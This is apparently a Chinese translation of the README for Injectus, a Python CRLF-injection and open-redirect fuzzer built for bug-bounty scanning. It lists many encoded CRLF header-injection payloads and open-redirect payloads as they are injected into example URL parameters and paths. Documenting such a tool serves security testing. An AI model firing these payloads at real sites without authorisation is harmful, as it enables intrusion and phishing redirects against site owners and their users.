Injectus——CRLF 和开放重定向模糊器

简单的 Python 工具，它遍历 URL 列表，尝试 CRLF 并打开重定向负载。

    ▪   ▐ ▄  ▐▄▄▄▄▄▄ . ▄▄· ▄▄▄▄▄▄• ▄▌.▄▄ ·
    ██ •█▌▐█  ·██▀▄.▀·▐█ ▌▪•██  █▪██▌▐█ ▀.
    ▐█·▐█▐▐▌▪▄ ██▐▀▀▪▄██ ▄▄ ▐█.▪█▌▐█▌▄▀▀▀█▄
    ▐█▌██▐█▌▐▌▐█▌▐█▄▄▌▐███▌ ▐█▌·▐█▄█▌▐█▄▪▐█
    ▀▀▀▀▀ █▪ ▀▀▀• ▀▀▀ ·▀▀▀  ▀▀▀  ▀▀▀  ▀▀▀▀
               ~ BOUNTYSTRIKE ~

usage: Injectus [-h] [-f FILE] [-u URL] [-r] [-w WORKERS] [-t TIMEOUT]
                [-d DELAY] [-c] [-op]

CRLF and open redirect fuzzer. Crafted by @dubs3c.

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing URLs
  -u URL, --url URL     Single URL to test
  -r, --no-request      Only build attack list, do not perform any requests
  -w WORKERS, --workers WORKERS
                        Amount of asyncio workers, default is 10
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP request timeout, default is 6 seconds
  -d DELAY, --delay DELAY
                        The delay between requests, default is 1 second
  -c, --crlf            Only perform crlf attacks
  -op, --openredirect   Only perform open redirect attacks

动机

需要一个简单的 CRLF/open 重定向扫描器，可以将其纳入我的漏洞赏金管道 https://github.com/BountyStrike/Bountystrike-sh 。没有找到任何满足我需求的工具，所以我创建了 Injectus。这是一个小小的实验，看看它是否比其他工具更好用。

设计

假如我们有以下 URL：

https://dubell.io/?param1=value1&url=value2&param3=value3

对于 CRLF 攻击，Injectus 会将每个有效载荷注入到每 n 个参数的一个参数值中一次。例如，Injectus 将使用上面的 URL 创建以下列表：

https://dubell.io/?param1=%%0a0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0d%0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%23%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25%30%61bounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25%30abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%250abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25250abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%3f%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%u000abounty:strike&url=value2&param3=value3

https://dubell.io/?param1=value1&url=%%0a0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0d%0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%23%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25%30%61bounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25%30abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%250abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25250abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%3f%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%u000abounty:strike&param3=value3

https://dubell.io/?param1=value1&url=value2&param3=%%0a0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0d%0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%23%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25%30%61bounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25%30abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%250abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25250abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%3f%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%u000abounty:strike

如您所见，每个 CRLF 有效载荷都注入到第一个参数的值中。循环完成后，Injectus 会将每个有效载荷注入到第二个参数中，依此类推。注入所有参数后，列表就完成了。

如果没有查询参数，Injectus 将简单地将每个有效负载附加到 URL，如下所示：

https://dubell.io/some/path/%%0a0abounty:strike
https://dubell.io/some/path/%0abounty:strike
https://dubell.io/some/path/%0d%0abounty:strike
https://dubell.io/some/path/%0dbounty:strike
https://dubell.io/some/path/%23%0dbounty:strike
https://dubell.io/some/path/%23%0dbounty:strike
https://dubell.io/some/path/%25%30%61bounty:strike
https://dubell.io/some/path/%25%30abounty:strike
https://dubell.io/some/path/%250abounty:strike
https://dubell.io/some/path/%25250abounty:strike
https://dubell.io/some/path/%3f%0dbounty:strike
https://dubell.io/some/path/%3f%0dbounty:strike
https://dubell.io/some/path/%u000abounty:strike

当注入开放重定向负载时，仅当存在包含典型重定向关键字的查询/路径参数时，Injectus 才会注入负载，例如url。注入以下 URL https://dubell.io/?param1=value1&url=dashboard&param3=value3：

https://dubell.io/?param1=value1&url=$2f%2fbountystrike.io%2f%2fparam3=value3
https://dubell.io/?param1=value1&url=%2f$2fbountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io%2f%2fparam3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io//param3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=////bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=///bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=//bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/\x08ountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/http://bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=bountystrike.ioparam3=value3

URL 包含查询参数url，因此 Injectus 会将有效负载注入该参数中。

使用路径参数的示例。原始 URL 是https://dubell.io/some/path/that/redirect/dashboard：

https://dubell.io/some/path/that/redirect/$2f%2fbountystrike.io%2f%2f
https://dubell.io/some/path/that/redirect/%2f$2fbountystrike.io
https://dubell.io/some/path/that/redirect/%2fbountystrike.io%2f%2f
https://dubell.io/some/path/that/redirect/%2fbountystrike.io
https://dubell.io/some/path/that/redirect/%2fbountystrike.io//
https://dubell.io/some/path/that/redirect/////bountystrike.io
https://dubell.io/some/path/that/redirect////bountystrike.io
https://dubell.io/some/path/that/redirect///bountystrike.io
https://dubell.io/some/path/that/redirect//\x08ountystrike.io
https://dubell.io/some/path/that/redirect//bountystrike.io
https://dubell.io/some/path/that/redirect//http://bountystrike.io
https://dubell.io/some/path/that/redirect/bountystrike.io

与以前一样，如果没有找到查询参数或路径参数，Injectus 将简单地将每个有效负载附加到 URL：

https://dubell.io/$2f%2fbountystrike.io%2f%2f
https://dubell.io/%2f$2fbountystrike.io
https://dubell.io/%2fbountystrike.io%2f%2f
https://dubell.io/%2fbountystrike.io
https://dubell.io/%2fbountystrike.io//
https://dubell.io/////bountystrike.io
https://dubell.io////bountystrike.io
https://dubell.io///bountystrike.io
https://dubell.io//\\bountystrike.io
https://dubell.io//bountystrike.io
https://dubell.io//http://bountystrike.io
https://dubell.io/bountystrike.io

安装

pip3.7 install -r requirements.txt --user

国内下载链接